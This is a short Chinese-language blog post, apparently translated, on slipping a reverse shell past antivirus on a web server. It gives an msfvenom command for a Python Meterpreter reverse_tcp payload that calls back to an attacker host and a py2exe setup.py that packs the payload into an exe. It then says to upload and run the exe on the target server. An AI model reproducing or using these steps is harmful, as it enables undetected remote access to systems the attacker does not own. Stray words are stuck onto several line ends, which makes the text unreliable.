有時候網站服務器上有殺毒軟件,咱們上傳的nc.exe、lcx.exe等工具都被殺了,這時候就須要一款免殺的工具來反彈shell。python
這篇博客主要是依據國外的一片文章翻譯而來,根據國外大佬的教程將Python腳本轉換成exe程序便可免殺。shell
參考連接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1服務器
第1步:安裝Python2.7和Py2exesocket
必定要安裝32位的Python 2.7和32位的Py2exe,無論你的操做系統是多少位的都要安裝32位版本。tcp
第2步:生成Python腳本工具
利用msfvenom生成Python腳本:網站
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.34.2 lport=443 -f raw -o /tmp/mrtp.py
第3步:建立setup.pyspa
from distutils.core import setup import py2exe setup( name = 'Meter', description = 'Python-based App', version = '1.0', console=['mrtp.py'], options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}}, zipfile = None, )
第4步:生成exe操作系統
將以前生成的mrtp.py和setup.py放在同一個目錄,而後執行命令:翻譯
python setup.py py2exe
稍等幾秒鐘便可轉換成功,生成的exe程序保存dist目錄。
第5步:反彈shell
首先使用MSF監聽端口等待回連,而後將生成的exe程序上傳的網站服務器並運行該程序便可反彈shell。